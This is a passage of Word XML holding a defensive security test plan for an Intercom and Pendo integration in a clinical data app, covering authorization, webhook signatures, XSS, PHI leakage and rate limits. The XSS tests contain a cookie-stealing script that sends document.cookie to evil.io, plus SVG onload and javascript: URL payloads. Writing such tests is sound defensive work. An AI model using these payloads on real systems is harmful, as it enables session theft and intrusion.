                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>AuthZ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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F976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IDOR: token of User A cannot fetch User B conversation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F3D7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curl -X GET 'https://api.intercom.io/conversations/conv_USER_B_55992' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB657FA" w14:textId="7A85386D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-H 'Authorization: Bearer {INTERCOM_API_TOKEN_USER_A}' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1059BF74" w14:textId="244B6442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-H 'Intercom-Version: 2.11'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2905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HTTP 403 Forbidden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09394E1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Body: {"errors":[{"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code":"forbidden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"}]}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7675064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MUST NOT </w:t>
            </w:r>
            <w:proofErr w:type="gram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return</w:t>
            </w:r>
            <w:proofErr w:type="gram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conversation body</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027E56F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MUST NOT expose User B email/name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43DB09B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Log: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unauthorized_access_attempt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conv_55992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1607E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FA18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4BD7D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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="5BBCF13A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1ADB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TC-API</w:t>
            </w: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lastRenderedPageBreak/>
              <w:t>-003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0FB0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lastRenderedPageBreak/>
              <w:t>V-03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AF6F6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7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">API </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>AuthZ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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116C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Expired Bearer token rejected — 401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3D83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curl -X GET 'https://api.intercom.io/contacts' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327A7C7D" w14:textId="10EDB0E0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-H 'Authorization: Bearer EXPIRED_TOKEN_abc123xyz' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20069E67" w14:textId="70D107C6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lastRenderedPageBreak/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-H 'Intercom-Version: 2.11'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7AAD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lastRenderedPageBreak/>
              <w:t>HTTP 401 Unauthorized</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1061B04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lastRenderedPageBreak/>
              <w:t>Body: {"errors":[{"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code":"unauthorized","message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":"..."]}}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB47A2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MUST NOT return any contact data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBEBBE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Retry-After header present if rate applies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C4ECE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841A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A7CA7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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="6260F1AD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F20B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TC-API-004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8480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V-03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126EB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7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">API </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B3F00"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>AuthZ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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EB32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Scope-limited token blocked from admin endpoint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BB85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curl -X GET 'https://api.intercom.io/admins' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="515B7490" w14:textId="6F3E5B44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-H 'Authorization: Bearer {READ_ONLY_SCOPED_TOKEN}' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C93906E" w14:textId="29E918B7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-H 'Intercom-Version: 2.11'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896D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HTTP 403 Forbidden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5E950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Body: errors[].code = 'forbidden'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8759B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No admin list returned</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C88F80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Log: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scope_violation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on /admins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0E444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1BA8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CAA5F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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="5411AD23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45AB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TC-WH-001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98C7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V-06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E13C9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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Webhook</w:t>
            </w:r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9D11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Valid HMAC-signed webhook accepted and processed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7861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payload='{"type":"conversation.user.replied","id":"conv_88441"}'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9F402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sig=$(echo -n "$payload" |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openssl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dgst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-sha256 \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B6CC2F3" w14:textId="5A057F85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-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hmac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"$INTERCOM_WEBHOOK_SECRET" -hex | awk '{print $2}')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="167FD99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curl -X POST 'https://edcapp.medrio.com/webhooks/intercom' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41CC4742" w14:textId="53ECD61D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-H "X-Hub-Signature-256: sha256=$sig" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D6860B" w14:textId="6792DAB7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-H 'Content-Type: application/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json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' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E13062" w14:textId="5B1ABCE2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-d "$payload"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9F80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HTTP 200 OK from webhook receiver</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F7C982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Event logged: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conversation.user.replied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conv_88441</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59E6F7A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No rejection in application logs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB86EF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DB: conversation state updated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56EF2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DE76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2F159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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="5C2C89D8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BEE5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TC-WH-002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30BD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V-06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94212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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Webhook</w:t>
            </w:r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86AA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Tampered payload with original signature → rejected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078C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# Valid payload + valid </w:t>
            </w:r>
            <w:proofErr w:type="gram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sig</w:t>
            </w:r>
            <w:proofErr w:type="gram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, then alter payload type:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC5A07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Original payload: {"type":"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conversation.user.replied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",...}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BAAB88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Tampered payload: {"type":"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conversation.admin.assigned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",...}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F76A43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Send ORIGINAL signature with TAMPERED body</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05874F5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curl -X POST '.../webhooks/intercom' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32FA8ED9" w14:textId="76E2DAC4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-H "X-Hub-Signature-256: sha256=$ORIGINAL_SIG" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5146EC0E" w14:textId="3C0EDB83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-d '{"type":"conversation.admin.assigned","id":"conv_88441"}'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AAB0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HTTP 401 Unauthorized</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E0127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Body: {"error":"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signature_mismatch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"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A325BA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Event NOT processed — no DB change</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F283B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Log: WARN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webhook_rejected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signature_mismatch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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2BA00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65B4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8A55C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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="2654A25E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111F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TC-WH-003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BEDA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V-06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9ECBA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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Webhook</w:t>
            </w:r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B5E1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Missing X-Hub-Signature-256 header → 401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6170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curl -X POST 'https://edcapp.medrio.com/webhooks/intercom' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2E9D51" w14:textId="4C5CB171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-H 'Content-Type: application/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json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' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46561F97" w14:textId="55F8FCE9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-d '{"type":"conversation.user.replied","id":"conv_88441"}'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7106C4B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// No signature header sent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65B2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HTTP 401 Unauthorized</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD4C95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Body must include: {"error":"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missing_signature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"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="373D732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Event NOT processed or stored</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B76DFB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No sensitive data echoed back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0DC00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4BD2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929C8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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="09B02598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5B94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TC-WH-004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1BD6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V-06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CAFE6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0D6655"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Webhook</w:t>
            </w:r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4F85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Replayed webhook (same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payload+sig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) rejected if replay protection active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765F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# Step 1: Send valid webhook (TC-WH-001) → 200 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="334F781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# Step 2: Resend IDENTICAL request (same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headers+body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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ABEEF8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# within 5 minutes (replay window)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59F7304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curl -X POST '.../webhooks/intercom' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B05179E" w14:textId="68A2BC26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-H "X-Hub-Signature-256: sha256=$SAME_SIG" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D680F33" w14:textId="44F58581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-d "$SAME_PAYLOAD"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BC24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HTTP 409 Conflict or 200 (idempotent)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FFA460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If replay protection: Body={"error":"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duplicate_event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"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F5DB27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Event processed only ONCE — no duplicate DB records</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="089562E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Log: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duplicate_webhook_id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detected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08E5C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25A1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6985E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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4B85EE91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EEAB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TC-XSS-001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F7F0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V-04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8A50E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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>XSS/Injection</w:t>
            </w:r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0D37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Script tag in Intercom name attribute not executed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C693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window.Intercom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('update', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5D7B03" w14:textId="62718DBB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name: '&lt;script&gt;fetch("https://evil.io/?c="+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document.cookie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)&lt;/script&gt;'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2344EA9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}</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="25E9A90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// Observe Intercom messenger UI rendering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5840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Script NOT executed in browser (no outbound evil.io request)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA5B86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Value rendered as literal escaped text in widget UI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A067C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Console: 0 additional JS errors</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B998F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Network: no request to evil.io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D9EE3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5209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F2AB3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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="7D8F7E2A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E0CD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lastRenderedPageBreak/>
              <w:t>TC-XSS-002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F579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V-04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11534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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>XSS/Injection</w:t>
            </w:r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7265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SVG onload injection via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custom_attributes.bio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blocked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67EC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window.Intercom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('update', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="764B0B82" w14:textId="5E21ACCE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custom_attributes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: {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38056B4B" w14:textId="40ED11F3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bio: "&lt;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svg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onload=\"alert(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document.domain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)\"&gt;"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42F1F9D5" w14:textId="77E43E6A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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="580A353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}</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1AA7B0A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// Check widget messenger contact card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1E42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alert() NOT triggered</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0B211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SVG tag rendered as plain escaped text</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="050200B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No JS execution context created</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E1781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Console: 0 alerts or JS events from SVG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9ED5E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3FA2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07D31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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="3FC89E03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8086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TC-XSS-003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6DD5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V-04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6137E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C0392B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>XSS/Injection</w:t>
            </w:r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6AE2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javascript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: URL in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profile_url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custom attribute sanitized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3DEC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window.Intercom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('update', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E26D64D" w14:textId="25BF4DC3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custom_attributes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: {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F84FE5" w14:textId="7782FBC4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profile_url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: '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javascript:alert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(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document.cookie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)'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1DCAD8" w14:textId="0EC73FE1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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40FBCBB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}</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="16C1E54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// Click rendered link in Intercom widget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65D9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Link click does NOT execute alert()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C1408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URL replaced with '#' or blocked entirely</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D61AC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No JS execution — browser shows no dialog</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28CDBE3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Network: no unexpected outbound call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7758F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5DB8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35ECD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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="7D6189DA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2B42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TC-PII-001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5240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V-02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55DFF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6A0DAD"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>PII Exposure</w:t>
            </w:r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3AD9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INTERCOM_IDENTITY_SECRET not visible in browser network tab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67AC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1. Open Chrome DevTools → Network tab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A90FBB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2. Login to EDC as qa_user@medrio.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1716342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3. Filter requests: intercom</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49DBF31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4. Inspect all Intercom JS boot payloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1608BBC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5. Search for 'INTERCOM_IDENTITY_SECRET' or raw key value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88AA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ZERO occurrences of INTERCOM_IDENTITY_SECRET in any network request</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108BD57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Only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user_hash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(hashed output) present — never the raw secret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F89749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Console: no secret value printed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="374BE6A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Source maps: secret not in client JS bundle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C8E46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B0C1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AACBC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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4B6FC836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25D1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TC-PII-002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92C2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V-02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0430A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6A0DAD"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>PII Exposure</w:t>
            </w:r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8B32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EDC studyId /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siteId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not in Intercom API error response body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E5EF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curl -X GET 'https://api.intercom.io/conversations/INVALID_CONV_999' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="303E5518" w14:textId="12BEF18E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-H 'Authorization: Bearer {INTERCOM_API_TOKEN_EDC}' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62533D01" w14:textId="7FC3E804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-H 'Intercom-Version: 2.11'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82D8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HTTP 404 Not Found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D83A1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Body: {"errors":[{"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code":"not_found","message":"Resource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Not Found"}]}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D38485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Body MUST NOT contain: studyId,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siteId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,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subjectId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, email</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433CD56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No stack trace in response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2A98E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F72B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0D749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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="6C8B8790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09E6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TC-PII-003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9A6A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V-02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AB786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6A0DAD"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>PII Exposure</w:t>
            </w:r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F504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Intercom widget boot does not log email to browser console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7309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1. Open Chrome DevTools → Console</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="665F322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2. Enable 'Verbose' log level</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D139ED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3. Login to EDC, trigger Intercom boot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C273E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4. Search console output for: email,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user_id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, qa_user@medrio.com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63DD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Zero matches for raw email in Console output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65DE31E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Zero </w:t>
            </w:r>
            <w:proofErr w:type="gram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matches for</w:t>
            </w:r>
            <w:proofErr w:type="gram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raw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user_id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value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182E110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Only obfuscated/hashed identifiers permitted if any</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A4F779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No Intercom internal tokens visible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C5525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B2C2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8D6F6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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="0F3047F5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C843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TC-PII-004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A0BC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V-05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28F30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6A0DAD"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>PII Exposure</w:t>
            </w:r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BD94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Pendo initialize() does not send PHI fields in visitor metadata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ABB5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1. Open Network tab, filter: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pendo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="06B247A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2. Login to EDC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0072E6D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3. Inspect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pendo.initialize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() call payload:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530DDF61" w14:textId="7F58B69A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POST https://app.pendo.io/data/guide</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="563F64F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4. Decode payload — check visitor fields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0CC5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Visitor object contains ONLY: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visitorId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(opaque hash)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747C0E6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MUST NOT </w:t>
            </w:r>
            <w:proofErr w:type="gram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contain:</w:t>
            </w:r>
            <w:proofErr w:type="gram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email,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subjectId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,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studyName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,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siteId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5642703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Account object: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accountId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only — no study names</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD801A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Log: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pendo_init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fields verified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4B11E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BCE5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80F4F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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4CB059BA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5380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lastRenderedPageBreak/>
              <w:t>TC-PII-005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33CF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V-05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669BB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6A0DAD"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>PII Exposure</w:t>
            </w:r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305E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Pendo metadata in CSP tenant contains no subject identifiers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60FA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1. Login to CSP as sponsor role</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E3AEB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2. Open Network → filter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pendo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4DB1B68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3. Inspect all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pendo.track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() POST payloads</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B37CE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4. Search payload JSON for: subject, patient,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subjectId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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AB3E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ZERO subject/patient identifiers in any Pendo payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1864A1E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Only opaque event names (e.g. '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study_opened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') permitted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A3CD7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No PHI in event properties object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F4BEB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0347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A6925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E67E22"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="7775ACF4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F11A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TC-PII-006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43E4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V-08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52B9D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6A0DAD"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>PII Exposure</w:t>
            </w:r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7045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pendo.track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() event properties contain no raw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subjectId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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F7E4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// Trigger in-app action that fires Pendo event</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444CA53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// e.g., open subject record in EDC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B6A072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// Intercept via Pendo debugger or Network tab:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DA0CEB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pendo.track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('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subject_record_opened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', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2705C4" w14:textId="5FC45CF1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subjectId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: 'SUB-001'</w:t>
            </w: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// THIS IS THE RISK PATTERN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D150E6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}</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6BD5D22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// Verify actual payload sent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C8C2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Pendo event payload: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subjectId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field ABSENT or replaced with hash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01CA31A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Safe pattern: {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subjectRef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: SHA256('SUB-001') }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44DF99F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Network: no raw clinical identifier in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pendo.track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body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1E7A7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0E37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3E284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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="19A60E57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9060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TC-RL-001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8F7E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V-09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B767D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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Rate Limiting</w:t>
            </w:r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D993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83 req/10s to Intercom proxy returns 429 with Retry-After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C8E5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# k6 load script:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="249E00B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import http from 'k6/http</w:t>
            </w:r>
            <w:proofErr w:type="gram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';</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5C8D52A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export let options = {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vus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: 84, duration: '10s' </w:t>
            </w:r>
            <w:proofErr w:type="gram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};</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="34A8AE0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export default function() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462928D2" w14:textId="1136FC02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http.get('https://edcapp.medrio.com/api/intercom/proxy/conversations',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340FD7CE" w14:textId="60E441EC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{ headers: { Authorization: 'Bearer {INTERCOM_API_TOKEN_EDC}' }}</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="5ED6D9A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}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95B2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HTTP 429 returned after 83rd request in 10s window</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BDB8FF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Header: Retry-After: &lt;seconds&gt; present</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="212E964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Body: {"error":"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rate_limit_exceeded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"}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1347E75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Requests 1-83: HTTP 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48824A9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Log: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rate_limit_triggered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user=usr_qa_001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3A0B3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8CED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2EEF5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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="15881EDA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0D13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TC-RL-002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6C18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V-09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B7219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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Rate Limiting</w:t>
            </w:r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4EDF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10x rapid widget boot/shutdown — no zombie DOM elements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90D9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// Execute in browser console:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54EC42E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for(let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i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=0;i&lt;10;i++){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D0B12E" w14:textId="3DD3513C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window.Intercom('boot',{app_id:'app_edc_prod',user_id:'usr_qa_001'}</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0F29E9D6" w14:textId="2A406F36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window.Intercom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('shutdown'</w:t>
            </w:r>
            <w:proofErr w:type="gram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);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="55FC6C1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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FCB94C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// Then inspect DOM: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7A21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DOM query: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document.querySelectorAll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('#intercom-container')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B2E3C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Result: exactly 1 element (not 10)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AD896A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No orphaned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iframes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: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document.querySelectorAll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('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iframe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[name*=intercom]').length === 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5217F38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Memory: no heap growth &gt; 50MB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BE5AB9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Console: no uncaught exceptions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40F14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342A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149C7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980B9"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="3FD2E8B9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4569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TC-CSP-001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A4D4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V-07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24FCB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D35400"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>CSP</w:t>
